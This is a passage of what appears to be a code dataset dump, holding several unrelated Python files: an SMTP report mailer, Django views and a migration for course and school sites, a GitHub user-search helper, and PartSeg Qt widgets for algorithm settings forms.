file_name = os.path.basename(REPORT_FILE)\n file.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % (file_name))\n email_obj.attach(file)\n\n # module smtplib is responsible for send mail\n def send_mail(self, email_obj):\n smtp_obj = smtplib.SMTP_SSL(self.mail_host, self.host_port)\n try:\n smtp_obj.login(self.mail_user, self.mail_pwd)\n except smtplib.SMTPAuthenticationError as e:\n logger.exception(\"Authentication failed!! \\r%s\" % (e))\n for address in self.target_addr_list:\n try:\n smtp_obj.sendmail(self.mail_user, address, email_obj.as_string())\n logger.info(\"Report has been successful sent to %s\" % (address))\n except smtplib.SMTPException as e:\n logger.error(\"Fail to sent report to %s\" % (address))\n logger.exception(\"caused by %s\" % (e))\n smtp_obj.quit()\n\n def send(self):\n mail_obj = self.mail_obj()\n self.attach_content(mail_obj)\n self.attach_file(mail_obj)\n self.send_mail(mail_obj)\n\n\nif __name__ == '__main__':\n target_addr_list = [\"dfjakljdsafsdaf@qq.com\", \"78376474@qq.com\"]\n E = Mail(target_addr_list)\n E.send()\n","sub_path":"utils/common/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"402667433","text":"#encoding: utf-8\nfrom django.shortcuts import render\nfrom django.views.generic.base import View\n# Create your views here.\n\nfrom .models import Course,CourseResource\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom operation.models import UserFavourites,CourseComments,UserCourse\nfrom django.http import HttpResponse\nfrom utils.mixin_utils import LoginRequiredMixin\nfrom django.db.models import Q\nclass CourseListView(View):\n def get(self,request):\n allCourses = Course.objects.all().order_by(\"-add_time\")\n hotCourses = Course.objects.all().order_by(\"-click_nums\")[:3]\n keywords = request.GET.get(\"keywords\",\"\")\n if keywords:\n allCourses = allCourses.filter(Q(name__icontains=keywords)|Q(detail__icontains=keywords)|Q(description__icontains=keywords))\n sort = request.GET.get(\"sort\", \"\")\n if sort == 'students':\n allCourses = allCourses.order_by(\"-students\")\n elif sort == 'hot':\n allCourses = allCourses.order_by(\"-click_nums\")\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n\n # Provide Paginator with the request object for complete querystring generation\n\n p = Paginator(allCourses, 1, request=request)\n\n allCourses = p.page(page)\n return render(request,'course-list.html',{\"allCourses\":allCourses,\"sort\":sort,'hotCourses':hotCourses})\n\nclass CourseDetailView(View):\n def get(self,request,course_id):\n hasFavourtieCourse = False\n hasFavourtieOrg = False\n if request.user.is_authenticated:\n if UserFavourites.objects.filter(user=request.user,fav_id=course_id):\n hasFavourtieCourse = True\n if UserFavourites.objects.filter(user=request.user,fav_id=2):\n hasFavourtieOrg = True\n\n course = Course.objects.get(id=int(course_id))\n course.click_nums += 1\n course.save()\n tag = course.tag\n if tag:\n relatedCourse = Course.objects.filter(tag=tag)\n else:\n relatedCourse = []\n return render(request,'course-detail.html',{\"course\":course,\"relatedCourse\":relatedCourse,\n \"hasFavourtieCourse\":hasFavourtieCourse,\"hasFavourtieOrg\":hasFavourtieOrg})\n\nclass CourseInfoView(LoginRequiredMixin,View):\n def get(self,request,course_id):\n course = Course.objects.get(id=int(course_id))\n userCourse = 
UserCourse.objects.filter(course=course)\n        if not userCourse:\n            userCourse = UserCourse(user=request.user,course=course)\n            userCourse.save()\n        userCouses = UserCourse.objects.filter(course=course)\n        userIds = [userCourse.user.id for userCourse in userCouses]\n        all_user_courses = UserCourse.objects.filter(user_id__in=userIds)\n        course_ids = [user_course.course.id for user_course in all_user_courses]\n        related_courses = Course.objects.filter(id__in=course_ids)\n        allLessons = course.get_lessons()\n        allResources = CourseResource.objects.all().filter(course=course)\n        return render(request,'course-video.html',{\"course\":course,\"allLessons\":allLessons,\"allResources\":allResources,\"related_courses\":related_courses})\nclass CourseCommentView(LoginRequiredMixin,View):\n    def get(self,request,course_id):\n        course = Course.objects.get(id=int(course_id))\n        userCouses = UserCourse.objects.filter(course=course)\n        userIds = [userCourse.user.id for userCourse in userCouses]\n        all_user_courses = UserCourse.objects.filter(user_id__in=userIds)\n        course_ids = [user_course.course.id for user_course in all_user_courses]\n        related_courses = Course.objects.filter(id__in=course_ids)\n        comments = course.coursecomments_set.all()\n        return render(request,'course-comment.html',{\"course\":course,\"comments\":comments,\"related_courses\":related_courses})\n\nclass AddCourseCommentsView(View):\n    def post(self,request):\n        if not request.user.is_authenticated():\n            return HttpResponse('{\"status\":\"fail\",\"msg\":\"用户未登录\"}',content_type='application/json')\n        else:\n            # POST values arrive as strings, so cast before the numeric check\n            couseId = int(request.POST.get(\"courseId\",0))\n            comments = request.POST.get(\"comment\",\"\")\n            if couseId > 0 and comments:\n                course = Course.objects.get(id=couseId)\n                courseComment = CourseComments()\n                courseComment.course = course\n                courseComment.user = request.user\n                courseComment.comments = comments\n                courseComment.save()\n                return HttpResponse('{\"status\":\"success\",\"msg\":\"添加成功\"}',content_type='application/json')\n            else:\n                return HttpResponse('{\"status\":\"fail\",\"msg\":\"添加失败\"}',content_type='application/json')\n","sub_path":"apps/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"133791568","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Blog',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('Createtime', models.DateTimeField(auto_now_add=True)),\n                ('Content', models.CharField(max_length=500)),\n                ('Link', models.CharField(max_length=300)),\n            ],\n            options={\n                'abstract': False,\n            },\n        ),\n        migrations.CreateModel(\n            name='Class',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('ClassNumber', models.IntegerField()),\n                ('GenerateYear', models.DateTimeField()),\n                ('Type', models.CharField(max_length=3, choices=[(b'\\xe5\\xb9\\xbc\\xe7\\xa8\\x9a\\xe5\\x9b\\xad', b'\\xe5\\xb9\\xbc\\xe7\\xa8\\x9a\\xe5\\x9b\\xad'), (b'\\xe5\\xad\\xa6\\xe5\\x89\\x8d\\xe7\\x8f\\xad', b'\\xe5\\xad\\xa6\\xe5\\x89\\x8d\\xe7\\x8f\\xad'), (b'\\xe5\\xb0\\x8f\\xe5\\xad\\xa6', b'\\xe5\\xb0\\x8f\\xe5\\xad\\xa6'), (b'\\xe5\\x88\\x9d\\xe4\\xb8\\xad', b'\\xe5\\x88\\x9d\\xe4\\xb8\\xad'), (b'\\xe9\\xab\\x98\\xe4\\xb8\\xad', 
b'\\xe9\\xab\\x98\\xe4\\xb8\\xad')])),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='ClassUser',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('idClass', models.ForeignKey(related_name='fkClassUser2Class', to='School.Class')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='Ralation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('Ralation', models.CharField(max_length=2, choices=[(b'\\xe7\\x88\\xb6\\xe4\\xba\\xb2', b'\\xe7\\x88\\xb6\\xe4\\xba\\xb2'), (b'\\xe6\\xaf\\x8d\\xe4\\xba\\xb2', b'\\xe6\\xaf\\x8d\\xe4\\xba\\xb2'), (b'\\xe7\\x88\\xb7\\xe7\\x88\\xb7', b'\\xe7\\x88\\xb7\\xe7\\x88\\xb7'), (b'\\xe5\\xa5\\xb6\\xe5\\xa5\\xb6', b'\\xe5\\xa5\\xb6\\xe5\\xa5\\xb6'), (b'\\xe5\\xa4\\x96\\xe5\\x85\\xac', b'\\xe5\\xa4\\x96\\xe5\\x85\\xac'), (b'\\xe5\\xa4\\x96\\xe5\\xa9\\x86', b'\\xe5\\xa4\\x96\\xe5\\xa9\\x86'), (b'\\xe5\\xa5\\xbd\\xe5\\x8f\\x8b', b'\\xe5\\xa5\\xbd\\xe5\\x8f\\x8b')])),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='School',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('Name', models.CharField(max_length=45)),\n ('Provence', models.CharField(max_length=20)),\n ('City', models.CharField(max_length=20)),\n ('Address', models.CharField(max_length=200)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('PhoneNumber', models.CharField(max_length=11)),\n ('Password', models.CharField(max_length=256)),\n ('UserName', models.CharField(default=b'', max_length=16)),\n ('MingZi', models.CharField(default=b'', max_length=16)),\n ('Sex', models.CharField(default=b'\\xe7\\x94\\xb7', max_length=3, choices=[(b'\\xe7\\x94\\xb7', b'\\xe7\\x94\\xb7'), (b'\\xe5\\xa5\\xb3', b'\\xe5\\xa5\\xb3')])),\n ('Role', models.CharField(default=b'\\xe5\\x85\\xb6\\xe4\\xbb\\x96', max_length=3, choices=[(b'\\xe6\\x95\\x99\\xe5\\xb8\\x88', b'\\xe6\\x95\\x99\\xe5\\xb8\\x88'), (b'\\xe5\\xae\\xb6\\xe9\\x95\\xbf', b'\\xe5\\xae\\xb6\\xe9\\x95\\xbf'), (b'\\xe5\\xad\\xa6\\xe7\\x94\\x9f', b'\\xe5\\xad\\xa6\\xe7\\x94\\x9f'), (b'\\xe5\\x85\\xb6\\xe4\\xbb\\x96', b'\\xe5\\x85\\xb6\\xe4\\xbb\\x96'), (b'\\xe5\\xbc\\x80\\xe6\\x8b\\x93\\xe8\\x80\\x85', b'\\xe5\\xbc\\x80\\xe6\\x8b\\x93\\xe8\\x80\\x85'), (b'\\xe7\\xae\\xa1\\xe7\\x90\\x86\\xe5\\x91\\x98', b'\\xe7\\xae\\xa1\\xe7\\x90\\x86\\xe5\\x91\\x98')])),\n ('HeaderFigure', models.CharField(max_length=300)),\n ('Nick', models.CharField(max_length=200)),\n ('CreateTime', models.DateTimeField(auto_now_add=True)),\n ('ModifyTime', models.DateTimeField(auto_now_add=True)),\n ('LastLoginTime', models.DateTimeField(auto_now_add=True)),\n ('CurStatus', models.CharField(max_length=3)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='UserToken',\n fields=[\n ('token', models.CharField(max_length=32, serialize=False, primary_key=True)),\n ('idUser', models.ForeignKey(related_name='fkToken2User', to='School.User')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.AddField(\n model_name='school',\n name='Principal',\n field=models.ForeignKey(related_name='fkSchool2User', to='School.User'),\n ),\n migrations.AddField(\n model_name='ralation',\n name='idUser',\n 
field=models.ForeignKey(related_name='fkcurUser2User', to='School.User'),\n ),\n migrations.AddField(\n model_name='ralation',\n name='idUserRalation',\n field=models.ForeignKey(related_name='fkRalationUser2User', to='School.User'),\n ),\n migrations.AddField(\n model_name='classuser',\n name='idUser',\n field=models.ForeignKey(related_name='fkClassUser2User', to='School.User'),\n ),\n migrations.AddField(\n model_name='class',\n name='idSchool',\n field=models.ForeignKey(related_name='fkClass2School', to='School.School'),\n ),\n migrations.AddField(\n model_name='blog',\n name='idAtClass',\n field=models.ForeignKey(related_name='fkBlog2Class', to='School.Class'),\n ),\n migrations.AddField(\n model_name='blog',\n name='idAtStudent',\n field=models.ForeignKey(related_name='fkBlog2StudentUser', to='School.User'),\n ),\n migrations.AddField(\n model_name='blog',\n name='idSender',\n field=models.ForeignKey(related_name='fkBlog2SenderUser', to='School.User'),\n ),\n ]\n","sub_path":"src/School/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"216201943","text":"import urllib2, json, csv\n\n'''Provides methods that interact with and parse responses from github'''\n\ndef get_top_five_login_names(user_input):\n\t\"\"\"Return top five login names on github as a list, based on user_input.\n\tuser_input -- the string to search for\n\t\"\"\"\n\tuser_input = \"+\".join(user_input.split())\n\tresponse = urllib2.urlopen(\"https://api.github.com/search/users?q=\"+user_input).read() #make a request to github rest endpoint\n\tdecoded = json.loads(response) #decode the json response into a python dictionary\n\tusers = decoded['items'] #get just the user info\n\tusers.sort(key=lambda user:user[\"login\"]) #sort users alphabetically by login\n\tusers = users[:5] #get the top five\n\ttop_five = [user[\"login\"] for user in users] #extract just the user names\n\treturn top_five\n\ndef get_char_freq_dist(string):\n\t\"\"\"Given a string, return a list of character frequencies, where index \n\tcorresponds with alphabetical order. 
The last index represents the number of \n\tnon-alphabetical characters.\"\"\"\n\tchar_frequency = [0]*27\n\tfor c in string:\n\t\to = ord(c) - 97 #set 'a' as the character with ord 0\n\t\tif o < 0 or o > 25: #if ord is not in alphabetical range\n\t\t\tchar_frequency[26] += 1 #increase 'other' freq\n\t\telse:\n\t\t\tchar_frequency[o] += 1 #increase corresponding letter freq\n\treturn char_frequency\n\ndef get_q1_info(user_input):\n\t'''Given a user_input, outputs answer in JSON parsable format.'''\n\ttop_five = get_top_five_login_names(user_input)\n\ts = \"\".join(top_five).lower() #concatenate the names into one string and change it to lower case\n\treturn get_char_freq_dist(s)\n\n","sub_path":"equity-zen/q1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507835065","text":"import collections\nimport typing\nfrom abc import ABCMeta, abstractmethod\nfrom copy import deepcopy\nfrom enum import Enum\n\nfrom qtpy.QtCore import Signal\nfrom qtpy.QtGui import QHideEvent, QPainter, QPaintEvent\nfrom qtpy.QtWidgets import (\n QApplication,\n QCheckBox,\n QComboBox,\n QFormLayout,\n QLabel,\n QLineEdit,\n QMessageBox,\n QScrollArea,\n QStackedLayout,\n QVBoxLayout,\n QWidget,\n)\nfrom six import with_metaclass\n\nfrom PartSeg.common_gui.error_report import ErrorDialog\nfrom PartSegCore.algorithm_describe_base import AlgorithmDescribeBase, AlgorithmProperty, SegmentationProfile\nfrom PartSegCore.channel_class import Channel\nfrom PartSegCore.image_operations import RadiusType\nfrom PartSegCore.segmentation.algorithm_base import (\n SegmentationAlgorithm,\n SegmentationLimitException,\n SegmentationResult,\n)\nfrom PartSegImage import Image\n\nfrom ..common_backend.base_settings import BaseSettings\nfrom ..common_backend.segmentation_thread import SegmentationThread\nfrom .dim_combobox import DimComboBox\nfrom .universal_gui_part import ChannelComboBox, CustomDoubleSpinBox, CustomSpinBox, EnumComboBox\n\n\ndef update(d, u):\n for k, v in u.items():\n if isinstance(v, collections.abc.Mapping):\n d[k] = update(d.get(k, {}), v)\n else:\n d[k] = v\n return d\n\n\nclass QtAlgorithmProperty(AlgorithmProperty):\n qt_class_dict = {\n int: CustomSpinBox,\n float: CustomDoubleSpinBox,\n list: QComboBox,\n bool: QCheckBox,\n RadiusType: DimComboBox,\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._widget = self._get_field()\n self.change_fun = self.get_change_signal(self._widget)\n self._getter, self._setter = self.get_getter_and_setter_function(self._widget)\n self._setter(self._widget, self.default_value)\n\n def get_value(self):\n return self._getter(self._widget)\n\n def recursive_get_values(self):\n if isinstance(self._widget, SubAlgorithmWidget):\n return self._widget.recursive_get_values()\n else:\n return self.get_value()\n\n def set_value(self, val):\n \"\"\"set value of widget \"\"\"\n return self._setter(self._widget, val)\n\n def get_field(self) -> QWidget:\n \"\"\"\n Get representing widget\n :return:\n :rtype:\n \"\"\"\n return self._widget\n\n @classmethod\n def from_algorithm_property(cls, ob):\n \"\"\"\n Create class instance base on :py:class:`.AlgorithmProperty` instance\n\n :type ob: AlgorithmProperty | str\n :param ob: AlgorithmProperty object or label\n :return: QtAlgorithmProperty | QLabel\n \"\"\"\n if isinstance(ob, AlgorithmProperty):\n return cls(\n name=ob.name,\n user_name=ob.user_name,\n 
default_value=ob.default_value,\n options_range=ob.range,\n single_steep=ob.single_step,\n property_type=ob.value_type,\n possible_values=ob.possible_values,\n help_text=ob.help_text,\n per_dimension=ob.per_dimension,\n )\n elif isinstance(ob, str):\n return QLabel(ob)\n raise ValueError(f\"unknown parameter type {type(ob)} of {ob}\")\n\n def _get_field(self) -> QWidget:\n \"\"\"\n Get proper widget for given field type. Overwrite if would like to support new data types.\n \"\"\"\n if self.per_dimension:\n self.per_dimension = False\n prop = self.from_algorithm_property(self)\n self.per_dimension = True\n res = ListInput(prop, 3)\n elif issubclass(self.value_type, Channel):\n res = ChannelComboBox()\n res.change_channels_num(10)\n return res\n elif issubclass(self.value_type, AlgorithmDescribeBase):\n res = SubAlgorithmWidget(self)\n elif issubclass(self.value_type, bool):\n res = QCheckBox()\n elif issubclass(self.value_type, int):\n res = CustomSpinBox()\n if not isinstance(self.default_value, int):\n raise ValueError(\n f\"Incompatible types. default_value should be type of int. Is {type(self.default_value)}\"\n )\n if self.range is not None:\n res.setRange(*self.range)\n elif issubclass(self.value_type, float):\n res = CustomDoubleSpinBox()\n if not isinstance(self.default_value, float):\n raise ValueError(\n f\"Incompatible types. default_value should be type of float. Is {type(self.default_value)}\"\n )\n if self.range is not None:\n res.setRange(*self.range)\n elif issubclass(self.value_type, str):\n res = QLineEdit()\n elif issubclass(self.value_type, Enum):\n res = EnumComboBox(self.value_type)\n # noinspection PyUnresolvedReferences\n elif issubclass(self.value_type, list):\n res = QComboBox()\n res.addItems(list(map(str, self.possible_values)))\n else:\n raise ValueError(f\"Unknown class: {self.value_type}\")\n tool_tip_text = \"\"\n if self.help_text:\n tool_tip_text = self.help_text\n tool_tip_text += f\" default value: {str(self.default_value)}\"\n res.setToolTip(tool_tip_text)\n return res\n\n @staticmethod\n def get_change_signal(widget: QWidget):\n if isinstance(widget, QComboBox):\n return widget.currentIndexChanged\n elif isinstance(widget, QCheckBox):\n return widget.stateChanged\n elif isinstance(widget, (CustomDoubleSpinBox, CustomSpinBox)):\n return widget.valueChanged\n elif isinstance(widget, QLineEdit):\n return widget.textChanged\n elif isinstance(widget, SubAlgorithmWidget):\n return widget.values_changed\n elif isinstance(widget, ListInput):\n return widget.change_signal\n raise ValueError(f\"Unsupported type: {type(widget)}\")\n\n @staticmethod\n def get_getter_and_setter_function(\n widget: QWidget,\n ) -> typing.Tuple[\n typing.Callable[[QWidget,], typing.Any], typing.Callable[[QWidget, typing.Any], None] # noqa E231\n ]:\n \"\"\"\n For each widget type return proper functions. 
This functions need instance as first argument\n\n :return: (getter, setter)\n \"\"\"\n if isinstance(widget, ChannelComboBox):\n return widget.__class__.get_value, widget.__class__.set_value\n if isinstance(widget, EnumComboBox):\n return widget.__class__.get_value, widget.__class__.set_value\n if isinstance(widget, QComboBox):\n return widget.__class__.currentText, widget.__class__.setCurrentText\n elif isinstance(widget, QCheckBox):\n return widget.__class__.isChecked, widget.__class__.setChecked\n elif isinstance(widget, CustomSpinBox):\n return widget.__class__.value, widget.__class__.setValue\n elif isinstance(widget, CustomDoubleSpinBox):\n return widget.__class__.value, widget.__class__.setValue\n elif isinstance(widget, QLineEdit):\n return widget.__class__.text, widget.__class__.setText\n elif isinstance(widget, SubAlgorithmWidget):\n return widget.__class__.get_values, widget.__class__.set_values\n elif isinstance(widget, ListInput):\n return widget.__class__.get_value, widget.__class__.set_value\n raise ValueError(f\"Unsupported type: {type(widget)}\")\n\n\nclass ListInput(QWidget):\n change_signal = Signal()\n\n def __init__(self, property_el: QtAlgorithmProperty, length):\n super().__init__()\n self.input_list = [property_el.from_algorithm_property(property_el) for _ in range(length)]\n layout = QVBoxLayout()\n for el in self.input_list:\n el.change_fun.connect(self.change_signal.emit)\n layout.addWidget(el.get_field())\n self.setLayout(layout)\n\n def get_value(self):\n return [x.get_value() for x in self.input_list]\n\n def set_value(self, value):\n if not isinstance(value, (list, tuple)):\n value = [value for _ in range(len(self.input_list))]\n for f, val in zip(self.input_list, value):\n f.set_value(val)\n\n\ndef any_arguments(fun):\n def _any(*_):\n fun()\n\n return _any\n\n\nclass FormWidget(QWidget):\n value_changed = Signal()\n\n def __init__(self, fields: typing.List[AlgorithmProperty], start_values=None, dimension_num=1):\n super().__init__()\n if start_values is None:\n start_values = {}\n self.widgets_dict: typing.Dict[str, QtAlgorithmProperty] = dict()\n self.channels_chose: typing.List[typing.Union[ChannelComboBox, SubAlgorithmWidget]] = []\n layout = QFormLayout()\n layout.setContentsMargins(10, 0, 10, 0)\n # layout.setVerticalSpacing(0)\n element_list = map(QtAlgorithmProperty.from_algorithm_property, fields)\n for el in element_list:\n if isinstance(el, QLabel):\n layout.addRow(el)\n elif isinstance(el.get_field(), SubAlgorithmWidget):\n label = QLabel(el.user_name)\n if el.help_text:\n label.setToolTip(el.help_text)\n layout.addRow(label, el.get_field().choose)\n layout.addRow(el.get_field())\n self.widgets_dict[el.name] = el\n if el.name in start_values:\n el.get_field().set_starting(start_values[el.name])\n el.change_fun.connect(any_arguments(self.value_changed.emit))\n else:\n self.widgets_dict[el.name] = el\n label = QLabel(el.user_name)\n if el.help_text:\n label.setToolTip(el.help_text)\n layout.addRow(label, el.get_field())\n # noinspection PyUnresolvedReferences\n if issubclass(el.value_type, Channel):\n # noinspection PyTypeChecker\n self.channels_chose.append(el.get_field())\n if el.name in start_values:\n try:\n el.set_value(start_values[el.name])\n except (KeyError, ValueError, TypeError):\n pass\n el.change_fun.connect(any_arguments(self.value_changed.emit))\n self.setLayout(layout)\n self.value_changed.connect(self.update_size)\n\n def has_elements(self):\n return len(self.widgets_dict) > 0\n\n def update_size(self):\n 
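# keep the scrollable form tall enough for its laid-out contents\n        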
self.setMinimumHeight(self.layout().minimumSize().height())\n\n def get_values(self):\n return {name: el.get_value() for name, el in self.widgets_dict.items()}\n\n def recursive_get_values(self):\n return {name: el.recursive_get_values() for name, el in self.widgets_dict.items()}\n\n def set_values(self, values: dict):\n for name, value in values.items():\n if name in self.widgets_dict:\n self.widgets_dict[name].set_value(value)\n\n def image_changed(self, image: Image):\n if not image:\n return\n for channel_widget in self.channels_chose:\n if isinstance(channel_widget, ChannelComboBox):\n channel_widget.change_channels_num(image.channels)\n else:\n channel_widget.change_channels_num(image)\n\n\nclass SubAlgorithmWidget(QWidget):\n values_changed = Signal()\n\n def __init__(self, algorithm_property: AlgorithmProperty):\n super().__init__()\n if not isinstance(algorithm_property.possible_values, dict):\n raise ValueError(\n \"algorithm_property.possible_values should be dict.\" f\"It is {type(algorithm_property.possible_values)}\"\n )\n if not isinstance(algorithm_property.default_value, str):\n raise ValueError(\n \"algorithm_property.default_value should be str.\" f\"It is {type(algorithm_property.default_value)}\"\n )\n self.starting_values = {}\n self.property = algorithm_property\n self.widgets_dict: typing.Dict[str, FormWidget] = {}\n # TODO protect for recursion\n widget = FormWidget(algorithm_property.possible_values[algorithm_property.default_value].get_fields())\n widget.layout().setContentsMargins(0, 0, 0, 0)\n widget.value_changed.connect(self.values_changed)\n\n self.widgets_dict[algorithm_property.default_value] = widget\n self.choose = QComboBox(self)\n self.choose.addItems(list(algorithm_property.possible_values.keys()))\n self.setContentsMargins(0, 0, 0, 0)\n\n self.choose.setCurrentText(algorithm_property.default_value)\n\n self.choose.currentTextChanged.connect(self.algorithm_choose)\n # self.setStyleSheet(\"border: 1px solid red\")\n layout = QVBoxLayout()\n layout.setContentsMargins(4, 4, 4, 4)\n layout.addWidget(widget)\n if not widget.has_elements():\n widget.hide()\n self.hide()\n tmp_widget = QWidget(self)\n # tmp_widget.setMinimumHeight(5000)\n layout.addWidget(tmp_widget)\n self.tmp_widget = tmp_widget\n self.setLayout(layout)\n\n def set_starting(self, starting_values):\n self.starting_values = starting_values\n\n def set_values(self, val: dict):\n if not isinstance(val, dict):\n return\n self.choose.setCurrentText(val[\"name\"])\n if val[\"name\"] not in self.widgets_dict:\n self.algorithm_choose(val[\"name\"])\n if val[\"name\"] in self.widgets_dict:\n self.widgets_dict[val[\"name\"]].set_values(val[\"values\"])\n\n def recursive_get_values(self):\n return {name: el.recursive_get_values() for name, el in self.widgets_dict.items()}\n\n def get_values(self):\n name = self.choose.currentText()\n values = self.widgets_dict[name].get_values()\n return {\"name\": name, \"values\": values}\n\n def change_channels_num(self, image: Image):\n for i in range(self.layout().count()):\n el = self.layout().itemAt(i)\n if el.widget() and isinstance(el.widget(), FormWidget):\n el.widget().image_changed(image)\n\n def algorithm_choose(self, name):\n if name not in self.widgets_dict:\n if name not in self.property.possible_values:\n return\n start_dict = {} if name not in self.starting_values else self.starting_values[name]\n try:\n self.widgets_dict[name] = FormWidget(\n self.property.possible_values[name].get_fields(), start_values=start_dict\n )\n except KeyError as e:\n 
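# unknown algorithm name or bad field definition; re-raise so the error surfaces\n                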
raise e\n self.widgets_dict[name].layout().setContentsMargins(0, 0, 0, 0)\n self.layout().addWidget(self.widgets_dict[name])\n self.widgets_dict[name].value_changed.connect(self.values_changed)\n widget = self.widgets_dict[name]\n for i in range(self.layout().count()):\n lay_elem = self.layout().itemAt(i)\n if lay_elem.widget():\n lay_elem.widget().hide()\n if widget.has_elements():\n self.show()\n widget.show()\n else:\n self.hide()\n self.values_changed.emit()\n\n def showEvent(self, _event):\n # workaround for changing size\n self.tmp_widget.hide()\n\n def paintEvent(self, event: QPaintEvent):\n name = self.choose.currentText()\n if self.widgets_dict[name].has_elements() and event.rect().top() == 0 and event.rect().left() == 0:\n painter = QPainter(self)\n painter.drawRect(event.rect())\n\n\nclass AbstractAlgorithmSettingsWidget(with_metaclass(ABCMeta, object)):\n def __init__(self):\n pass\n\n @abstractmethod\n def get_values(self):\n \"\"\"\n :return: dict[str, object]\n \"\"\"\n return dict()\n\n\nclass BaseAlgorithmSettingsWidget(QScrollArea):\n values_changed = Signal()\n algorithm_thread: SegmentationThread\n\n def __init__(self, settings: BaseSettings, name, algorithm: typing.Type[SegmentationAlgorithm]):\n \"\"\"\n For algorithm which works on one channel\n \"\"\"\n super().__init__()\n self.settings = settings\n self.widget_list = []\n self.name = name\n self.algorithm = algorithm\n main_layout = QVBoxLayout()\n self.info_label = QLabel()\n self.info_label.setHidden(True)\n main_layout.addWidget(self.info_label)\n start_values = settings.get(f\"algorithm_widget_state.{name}\", dict())\n self.form_widget = FormWidget(algorithm.get_fields(), start_values=start_values)\n self.form_widget.value_changed.connect(self.values_changed.emit)\n # self.form_widget.setMinimumHeight(1500)\n self.setWidget(self.form_widget)\n value_dict = self.settings.get(f\"algorithms.{self.name}\", {})\n self.set_values(value_dict)\n # self.settings.image_changed[Image].connect(self.image_changed)\n self.algorithm_thread = SegmentationThread(algorithm())\n self.algorithm_thread.info_signal.connect(self.show_info)\n self.algorithm_thread.exception_occurred.connect(self.exception_occurred)\n\n def exception_occurred(self, exc: Exception):\n if isinstance(exc, SegmentationLimitException):\n mess = QMessageBox()\n mess.setIcon(QMessageBox.Critical)\n mess.setText(\"During segmentation process algorithm meet limitations:\\n\" + \"\\n\".join(exc.args))\n mess.setWindowTitle(\"Segmentation limitations\")\n mess.exec()\n return\n if isinstance(exc, RuntimeError) and exc.args[0].startswith(\n \"Exception thrown in SimpleITK KittlerIllingworthThreshold\"\n ):\n mess = QMessageBox()\n mess.setIcon(QMessageBox.Critical)\n mess.setText(\"Fail to apply Kittler Illingworth to current data\\n\" + exc.args[0].split(\"\\n\")[1])\n mess.setWindowTitle(\"Segmentation limitations\")\n mess.exec()\n return\n dial = ErrorDialog(exc, \"Error during segmentation\", f\"{QApplication.instance().applicationName()}\")\n dial.exec()\n\n def show_info(self, text):\n self.info_label.setText(text)\n self.info_label.setVisible(True)\n\n def image_changed(self, image: Image):\n self.form_widget.image_changed(image)\n self.algorithm_thread.algorithm.set_image(image)\n\n def set_mask(self, mask):\n self.algorithm_thread.algorithm.set_mask(mask)\n\n def set_values(self, values_dict):\n self.form_widget.set_values(values_dict)\n\n def get_values(self):\n return self.form_widget.get_values()\n\n def channel_num(self):\n return 
self.channels_chose.currentIndex()\n\n def execute(self, exclude_mask=None):\n values = self.get_values()\n self.settings.set(f\"algorithms.{self.name}\", deepcopy(values))\n self.algorithm_thread.set_parameters(**values)\n self.algorithm_thread.start()\n\n def hideEvent(self, a0: QHideEvent):\n self.algorithm_thread.clean()\n\n def recursive_get_values(self):\n return self.form_widget.recursive_get_values()\n\n\nclass AlgorithmSettingsWidget(BaseAlgorithmSettingsWidget):\n def execute(self, exclude_mask=None):\n self.algorithm_thread.algorithm.set_image(self.settings.image)\n super().execute(exclude_mask)\n\n\nclass InteractiveAlgorithmSettingsWidget(BaseAlgorithmSettingsWidget):\n algorithm_thread: SegmentationThread\n\n def __init__(self, settings, name, algorithm: typing.Type[SegmentationAlgorithm], selector: typing.List[QWidget]):\n super().__init__(settings, name, algorithm)\n self.selector = selector\n self.algorithm_thread.finished.connect(self.enable_selector)\n self.algorithm_thread.started.connect(self.disable_selector)\n # noinspection PyUnresolvedReferences\n if hasattr(settings, \"mask_changed\"):\n settings.mask_changed.connect(self.change_mask)\n\n def value_updated(self):\n if not self.parent().interactive:\n return\n self.execute()\n\n def change_mask(self):\n if not self.isVisible():\n return\n self.algorithm_thread.algorithm.set_mask(self.settings.mask)\n\n def disable_selector(self):\n for el in self.selector:\n el.setDisabled(True)\n\n def enable_selector(self):\n for el in self.selector:\n el.setEnabled(True)\n\n def get_segmentation_profile(self) -> SegmentationProfile:\n return SegmentationProfile(\"\", self.algorithm.get_name(), self.get_values())\n\n\nclass AlgorithmChoose(QWidget):\n finished = Signal()\n started = Signal()\n result = 